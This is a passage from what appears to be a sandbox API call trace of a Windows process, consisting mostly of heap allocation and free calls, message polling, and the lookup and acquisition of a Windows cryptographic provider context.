lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0205.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0205.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0205.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0205.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0205.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0205.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0205.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0205.278] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.278] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0205.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0205.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0205.278] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0205.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0205.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0205.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0205.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0205.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0205.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0205.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0205.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0205.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0205.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0205.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0205.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0205.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0205.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0205.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0205.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0205.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0205.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0205.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0205.279] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0205.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0205.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0205.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0205.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0205.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0205.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0205.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0205.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0205.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0205.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0205.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0205.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0205.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0205.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0205.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0205.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0205.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0205.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0205.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0205.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0205.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0205.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0205.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0205.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0205.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0205.280] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0205.280] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69c08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0205.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0205.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0205.280] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0205.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0205.280] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0205.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0205.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0205.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0205.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0205.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0205.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69b28 [0205.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69b28, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0205.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0205.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0205.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0205.281] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0205.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0205.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0205.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdf8 | out: hHeap=0x970000) returned 1 [0205.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0205.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0205.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0205.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0205.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0205.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0205.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0205.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0205.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0205.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0205.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0205.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0205.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0205.282] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0205.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0205.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0205.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0205.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0205.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0205.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0205.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0205.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0205.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0205.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0205.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0205.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0205.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0205.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0205.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0205.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0205.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0205.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0205.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0205.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0205.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0205.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0205.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0205.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0205.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0205.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0205.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0205.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0205.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0205.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0205.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0205.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0205.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0205.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0205.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0205.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0205.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0205.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0205.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0205.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0205.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0205.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0205.285] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0205.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0205.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0205.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0205.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0205.285] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0205.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0205.285] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0205.285] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0205.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0205.285] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0205.286] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.286] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.286] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fbc8 [0205.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0205.286] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0205.286] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0205.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0205.286] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0205.286] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0205.286] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0205.286] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0205.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0205.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0205.286] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0205.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0205.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0205.286] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0205.286] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0205.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0205.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0205.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0205.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0205.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0205.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0205.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0205.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0205.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0205.287] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0205.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0205.287] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0205.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0205.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0205.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0205.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0205.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0205.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0205.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0205.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0205.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0205.287] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0205.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0205.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0205.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0205.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0205.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0205.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0205.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0205.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0205.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0205.288] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0205.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0205.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0205.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0205.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0205.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0205.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0205.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0205.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0205.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0205.288] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0205.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0205.288] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0205.288] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0205.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0205.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0205.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0205.288] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0205.288] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0205.288] 